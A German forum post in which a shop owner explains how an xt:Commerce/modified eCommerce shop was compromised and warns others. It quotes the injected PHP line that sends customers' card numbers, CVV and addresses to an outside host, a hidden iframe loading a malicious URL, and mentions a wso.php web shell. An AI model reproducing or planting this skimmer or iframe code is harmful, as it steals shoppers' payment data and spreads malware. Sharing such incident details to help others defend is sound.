so, hab's jetzt gefunden.
Ich habe mich aufklären lassen und vielleicht ist es ja manchen auch bekannt, dass es eine Schwachstelle in xt:Commerce und modified eCommerce Shopsoftware Shops gibt,
die es 'Eindringlingen' erlaubt, Ihre Trojaner zu platzieren und entsprechenden Schaden anzurichten.
Kein Unsinn!
Aufgrund dessen hat wohl der Provider gewisse Dateien blockiert und somit konnte z.B. die betroffene
/inc/base64todec.inc.php von dem Modul orders.php, das ja die Bestellübersicht anzeigt, nicht mehr aufgerufen werden. Ich hab' mir dann mal diese modifizierte Datei base64todec.inc.php angesehen und festgestellt, dass am Schluss der Datei folgender Code eingefügt wurde:
if($order->info['cc_number']){ @file("http://verisign.zzl.org/_counter.php?log=".base64_encode($order->info['cc_number'].'|'.$order->info['cc_expires'].'|'.$order->info['cc_cvv'].'|'.$order->billing['firstname'] . ' ' . $order->billing['lastname'].'|'.$order->billing['street_address'].'|'.$order->billing['postcode'].'|'.$order->billing['city'].'|'.$order->billing['state'].'|'.$order->billing['country']['title'].'|'.$_SERVER['HTTP_HOST'].'|'.'PlaceboUP777=*('));} ... ganz schön dreist, wenn die Kreditkarteninfos so in der Welt verteilt werden.
Der zweite Angriffspunkt war die Datei /includes/header.php. Hier wurde ein Stück Javascript Code
eingefügt, dass - in lesbare Zeichen übersetzt - folgenden frame plaziert:
><iframe src=http://www.vanderschootbv.nl/administrator/components/l.php width=0 height=0 style="visibility:none;"></iframe><
Bitte NICHT den link austesten, da sonst eine PDF-Datei heruntergeladen wird, die sich dann im System entsprechend platziert. Ich hab' zumindest mit WireShark so viel getestet, dass ich gesehen habe, dass regelmäßig entsprechende Pakete an Zielserver geschickt wurden.
Mein Hoster hat mir berichtet, dass es da wohl schon öfters Probleme mit diesen Shops gegeben haben muss und ihm war die Thematik gleich vertraut.
So, wie kann man aber die einzelnen PHP-Dateien editieren ?
Das hat man damit erreicht, dass zunächst im home-Verzeichnis des Shops eine Datei mit dem Namen
wso.php kopiert wurde. Das ist mit entsprechenden POST-Befehlen möglich. Diese Datei stellt eine
Art Konsole dar und mit der kann man alles auf dem Server machen, was man möchte.
Also ein regelmäßiger Blick in die Verzeichnisse und genannte Dateien ist vielleicht nicht schlecht.
Ich hoffe, dass ich bisschen helfen konnte.
1. A